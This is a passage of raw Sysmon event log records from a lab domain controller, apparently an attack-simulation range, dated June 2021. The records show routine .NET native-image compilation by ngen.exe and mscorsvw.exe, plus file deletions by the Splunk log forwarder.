ramework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.296{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-B004-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.281{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-B004-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.281{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-B004-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021896Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:13.218{4DB9351A-A245-60D3-AF04-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\91c-0\System.Runtime.Caching.dll2021-06-23 21:06:13.218 10341000x800000000000000021895Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.078{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-AF04-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.062{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-AF04-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.062{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-AF04-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.015{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-AE04-00000000CF01}1084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.999{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-AE04-00000000CF01}1084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.999{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-AE04-00000000CF01}1084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:14.984{4DB9351A-A246-60D3-B704-00000000CF01}5284C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14a4-0\System.ServiceModel.Activation.dll2021-06-23 21:06:14.984 23542300x800000000000000021926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.703{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEC44CEA1D590ED79C810329407CE634,SHA256=5321AAA6B55D8331D37256FC58F1272C9B7FA7C3560EE309CC022D95AF6CEBD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A246-60D3-B704-00000000CF01}5284C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.609{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A246-60D3-B704-00000000CF01}5284C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.609{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A246-60D3-B704-00000000CF01}5284C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.515{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A246-60D3-B604-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.499{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A246-60D3-B604-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.499{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A246-60D3-B604-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:14.421{4DB9351A-A246-60D3-B504-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\94c-0\System.Security.dll2021-06-23 21:06:14.421 23542300x800000000000000021918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.078{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=52F784B9744A94A38E88BBD6619DBAC5,SHA256=6E6DBE7C98A7A9CF374601BFC67A321486976C49936146F3CA50D1AE94B836C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A246-60D3-B504-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.046{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A246-60D3-B504-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.046{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A246-60D3-B504-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.015{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-B404-00000000CF01}4860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:15.765{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2752441EC0461F03AFE70547C21A13CE,SHA256=80F329B6A864FE1B8EACF0F4AFAC3CBB08EEBFBB5DB88D9A42FFBC32C1007B1C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:15.249{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A247-60D3-B904-00000000CF01}7040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:15.234{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A247-60D3-B904-00000000CF01}7040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 